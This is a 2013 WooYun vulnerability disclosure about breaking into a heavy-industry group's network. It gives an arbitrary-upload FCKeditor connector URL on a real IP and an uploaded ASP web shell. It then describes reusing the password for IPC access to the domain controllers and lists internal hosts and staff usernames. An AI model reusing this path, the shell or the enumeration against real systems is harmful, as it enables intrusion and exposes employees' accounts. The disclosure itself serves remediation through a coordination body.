当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032800

漏洞标题:某重工业集团任意文件上传+系统通用密码可导致内网沦陷

相关厂商:某重工业集团

漏洞作者: 煦阳。

提交时间:2013-07-30 14:05

修复时间:2013-09-13 14:06

公开时间:2013-09-13 14:06

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

我什么都没动. 拒绝查水表...
ps:求审核人员改个霸气的名字 XD

详细说明:

http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
低版本 遍历 任意上传
http://218.5.70.231/1.asp  htc
提权后用当前帐号密码去IPC DC段.
\\dc  杀..
\\dcbak  杀..
然后....
没然后了.. 过程很简单. 我丢几张图就行了吧~
我什么都没动. 拒绝查水表...
Users currently logged on \\172.30.0.1:
A system error has occurred: 53
Users currently logged on \\172.30.0.5:
	-- NETSERVER$
	-- fong
	-- Acronis Agent User
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- IUSR_NETSERVER
	-- IUSR_NETSERVER
Users currently logged on \\172.30.0.6:
A system error has occurred: 53
Users currently logged on \\172.30.0.7:
	-- FAX-SERVER$
	-- Administrator
	-- Administrator
	-- IUSR_BI_BSC
Users currently logged on \\172.30.0.8:
A system error has occurred: 2138
Users currently logged on \\172.30.0.9:
	-- NEWCAIWU$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.10:
A system error has occurred: 53
Users currently logged on \\172.30.0.11:
	-- BETA-SERVER$
	-- Administrator
	-- Administrator
	-- szz
Users currently logged on \\172.30.0.12:
	-- CBMS-SERVER$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.13:
	-- FILE-SERVER$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- UPLOAD
	-- Administrator
	-- IUSR_FILESERVER-BAK
	-- UPLOAD
	-- UPLOAD
	-- IUSR_FILESERVER-BAK
	-- UPLOAD
Users currently logged on \\172.30.0.15:
A system error has occurred: 53
Users currently logged on \\172.30.0.16:
A system error has occurred: 53
Users currently logged on \\172.30.0.17:
A system error has occurred: 53
Users currently logged on \\172.30.0.18:
A system error has occurred: 53
Users currently logged on \\172.30.0.21:
	-- DATASERVER$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.22:
	-- BACKUPEXEC$
	-- backup
	-- IUSR_NETSERVER-BAK
	-- backup
	-- Administrator
	-- backup
	-- backup
Users currently logged on \\172.30.0.23:
A system error has occurred: 5
Users currently logged on \\172.30.0.24:
	-- FILESERVER-BAK$
	-- Administrator
Users currently logged on \\172.30.0.27:
	-- EAD$
	-- Administrator
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.28:
	-- EAD-BAK$
	-- Administrator
Users currently logged on \\172.30.0.29:
A system error has occurred: 64
Users currently logged on \\172.30.0.30:
	-- DCBAK$
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.32:
	-- NETSERVER-BAK$
	-- Administrator
Users currently logged on \\172.30.0.33:
	-- DLP-SERVER$
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.34:
A system error has occurred: 64
Users currently logged on \\172.30.0.38:
	-- BISERVER$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
Users currently logged on \\172.30.0.45:
A system error has occurred: 53
Users currently logged on \\172.30.0.54:
A system error has occurred: 53
Users currently logged on \\172.30.0.58:
A system error has occurred: 53
Users currently logged on \\172.30.0.80:
A system error has occurred: 53
Users currently logged on \\172.30.0.103:
	-- 	-- huangzc
Users currently logged on \\172.30.0.105:
	-- 	-- aigd
Users currently logged on \\172.30.0.108:
	-- 	-- liangh
Users currently logged on \\172.30.0.109:
	-- 	-- wangyl
Users currently logged on \\172.30.0.115:
A system error has occurred: 5
Users currently logged on \\172.30.0.121:
A system error has occurred: 5
Users currently logged on \\172.30.0.175:
A system error has occurred: 53
Users currently logged on \\172.30.0.176:
A system error has occurred: 53
Users currently logged on \\172.30.0.181:
A system error has occurred: 5
Users currently logged on \\172.30.0.202:
A system error has occurred: 53
Users currently logged on \\172.30.0.207:
	-- 	-- chents
Users currently logged on \\172.30.0.215:
	-- KE$
	-- Amdin
Users currently logged on \\172.30.0.219:
A system error has occurred: 5
Users currently logged on \\172.30.0.220:
	-- 	-- xufan
	-- AvastSoftwareUpdater
Users currently logged on \\172.30.0.221:
	-- 	-- zxf
Users currently logged on \\172.30.0.223:
	-- 	-- guoyj
	-- ASPNET
Users currently logged on \\172.30.0.224:
	-- suqj
	-- 
Users currently logged on \\172.30.0.225:
	-- 	-- zhangchh
Users currently logged on \\172.30.0.226:
	-- 	-- linfs
Users currently logged on \\172.30.0.251:
	-- 	-- wangl
Users currently logged on \\172.30.0.254:
	-- DC$
	-- Administrator
	-- Administrator
	-- Administrator
	-- Administrator
	-- IUSR_DC
	-- IUSR_DC
	-- IUSR_DC

漏洞证明:

fck.png


dc.png


shebei.png


修复方案:

这个。。

版权声明:转载请注明来源 煦阳。@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-08-03 17:18

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-30 15:24 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @xsser @疯狗 果然改得很霸气...

  2. 2013-07-30 15:57 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @煦阳。 - - !

  3. 2013-08-03 21:15 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    感谢 @cncert国家互联网应急中心 感谢CCTV. 感谢MTV. 感谢JPAV..有rank了~ 好开心~